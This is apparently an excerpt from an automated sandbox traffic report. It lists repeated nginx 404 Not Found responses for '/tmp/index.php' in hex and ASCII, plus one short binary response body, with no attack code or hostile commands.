                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
